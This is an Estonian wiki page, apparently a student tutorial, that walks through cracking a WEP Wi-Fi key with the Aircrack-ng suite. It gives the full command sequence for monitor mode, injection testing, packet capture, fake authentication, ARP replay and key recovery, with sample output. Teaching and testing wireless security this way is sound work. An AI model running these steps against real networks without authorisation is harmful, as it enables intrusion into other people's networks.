Aircrack: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Ktragel (talk | contribs)
Created page with "Kelly Tragel A21"
 
Ktragel (talk | contribs)
No edit summary
Line 1: Line 1:
Kelly Tragel
=Sissejuhatus=
A21
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.
 
=Eeldused=
 
* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])
 
WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>
 
või rohkema informatsiooni saamiseks:
 
<pre>lshw -class network</pre>
 
Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>
 
või
 
<pre>*-network
      description: Wireless interface
      product: Centrino Advanced-N 6205 [Taylor Peak]
      vendor: Intel Corporation
      physical id: 0
      bus info: pci@0000:02:00.0
      logical name: wlan0
      version: 34
      serial: 6c:88:14:1d:29:c4
      width: 64 bits
      clock: 33MHz
      capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
      configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
      resources: irq:32 memory:f7d00000-f7d01fff</pre>
 
<<!-- Warning style viksitud ArchWikist -->div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>
 
=Üldkirjeldus=
 
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks
 
==Süntaks==
 
aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>
 
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]
 
=Installeerimine=
 
Uuendame repositooriumi:
<pre>sudo apt-get update</pre>
 
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>
 
=Näide WEP kräkkimise protsessist=
 
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0<br>
 
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.<br>
 
Lühidalt sammudest, mida tegema asume:<br>
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)<br>
2. Testime „süstimise“ suutlikkust pääsupunktile <br>
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid<br>
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga <br>
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette<br>
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid<br>
 
'''Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.
Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>
 
Tulemus:
<pre>Interface      Chipset        Driver
 
wifi0          Atheros        madwifi-ng
ath0            Atheros        madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>
 
Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>
 
Tulemus:
<pre>lo        no wireless extensions.
 
eth0      no wireless extensions.
 
wifi0    no wireless extensions.</pre>
 
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.
 
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>
 
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.
 
Tulemus:
<pre> Interface      Chipset        Driver
wifi0          Atheros        madwifi-ng
ath0            Atheros        madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>
 
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.
 
Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>
 
Tulemus:
<pre>lo        no wireless extensions.
 
wifi0    no wireless extensions.
 
eth0      no wireless extensions.
 
ath0      IEEE 802.11g  ESSID:""  Nickname:""
      Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82 
      Bit Rate:0 kb/s  Tx-Power:18 dBm  Sensitivity=0/3 
      Retry:off  RTS thr:off  Fragment thr:off
      Encryption key:off
      Power Management:off
      Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
      Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
      Tx excessive retries:0  Invalid misc:0  Missed beacon:0</pre>
 
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.
Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0</pre>
 
''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''
 
Tulemus:
<pre>09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP
 
09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%</pre>
 
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid. 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>
 
''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''
 
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
00:14:6C:7E:40:80  42 100    5240  178307  338  9  54  WEP  WEP        teddy                         
                                                                                                           
BSSID              STATION            PWR  Lost  Packets  Probes                                           
                                                                                                           
00:14:6C:7E:40:80  00:0F:B5:88:AC:82  42    0  183782  </pre>
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''
 
Õnnestumise korral on tulemus:
<pre>18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request</pre>
'''
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.
 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
 
Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.
 
Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''
 
Tulemus:
<pre>                            [00:03:06] Tested 674449 keys (got 96610 IVs)
 
KB    depth  byte(vote)
0    0/  9  12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(  5) 77(  5) A5(  3) F6(  3) 03(  0)
1    0/  8  34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
2    0/  2  56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
3    1/  5  78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)
 
                      KEY FOUND! [ 12:34:56:78:90 ]
    Probability: 100%</pre>
 
=Kokkuvõte=
 
 
 
=Kasutatud kirjandus=
<references/>
 
=Autor(id)=
 
Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015
 
=Versioonide ajalugu=
 
<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td>  </td>
<td>  </td>       
</tr>
<tr>
<td>  </td>
<td>  </td>
</tr>
<tr>
</table>

Revision as of 20:55, 25 May 2015

Sissejuhatus

Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

Eeldused

  • Elementaarne käsurea kasutamisoskus
  • Teadmised WiFi, WEP, WPA/WPA2 kohta
  • Võrgus vähemalt 1 aktiivne klient
  • Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
  • Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
  • aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: siit ja siit)

WiFi adapteri vaatamine:

lspci -nn | grep Network

või rohkema informatsiooni saamiseks:

lshw -class network

Tulemuseks saame midagi sarnast:

02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)

või

*-network
       description: Wireless interface
       product: Centrino Advanced-N 6205 [Taylor Peak]
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlan0
       version: 34
       serial: 6c:88:14:1d:29:c4
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
       resources: irq:32 memory:f7d00000-f7d01fff
Pane tähele! Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone.

Üldkirjeldus

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:

  • airodump-ng - programm pakettide püüdmiseks
  • aireplay-ng - programm pakettide „süstimiseks“
  • aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
  • airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

Süntaks

aircrack-ng süntaks näeb välja järgmine:

aircrack-ng [võti] <püütud fail(id)>

Nimekirja võtmetele leiab SIIT!

Installeerimine

Uuendame repositooriumi:

sudo apt-get update

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:

sudo apt-get install aircrack-ng

Näide WEP kräkkimise protsessist

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:

  • Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
  • BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
  • ESSID (võrgu nimi): teddy
  • Pääsupunkti kanal: 9
  • Raadiovõrgu liides (ingl. k Wireless interface): ath0

Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)
2. Testime „süstimise“ suutlikkust pääsupunktile
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid

Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:

airmon-ng stop ath0

Tulemus:

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Kontrolli, kas kõik athX liidesed on ikka suletud:

iwconfig

Tulemus:

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval airmon-ng stop athX käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:

airmon-ng start wifi0 9

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:

iwconfig

Tulemus:

lo        no wireless extensions.

wifi0     no wireless extensions.

eth0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
       Retry:off   RTS thr:off   Fragment thr:off
       Encryption key:off
       Power Management:off
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!

Samm 2: Testime „süstimise“ suutlikkust pääsupunktile Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Selgituseks: -9 - “süstimise” test -e teddy – raadiovõrgu nimi -a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress ath0 – raadiovõrgu liides

Tulemus:

09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP 

09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

Samm 3: Avada airodump-ng pakettide püüdmiseks Ava uus konsooliaken ja sisesta:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Selgituseks: -c 9 – raadiovõrgu kanal --bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud -w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  

Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga Ava uus konsooliaken ja sisesta:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Selgitus: -1 – võlts autentimine 0 – kordusühendus(t)e aeg sekundites -h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress

Õnnestumise korral on tulemus:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
Ebaõnnestumise korral on tulemus: 
8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Tulemus:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

Samm 6: Ava aircrack-ng salasõna lahti murdmiseks Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Selgitus: -b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”

Tulemus:

                             [00:03:06] Tested 674449 keys (got 96610 IVs)

KB    depth   byte(vote)
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                      KEY FOUND! [ 12:34:56:78:90 ] 
     Probability: 100%

Kokkuvõte

Kasutatud kirjandus


Autor(id)

Kelly Tragel [ISa 21] Viimati muudetud: 25.05.2015

Versioonide ajalugu

Kuupäev Versioon
25.05.2015 1.0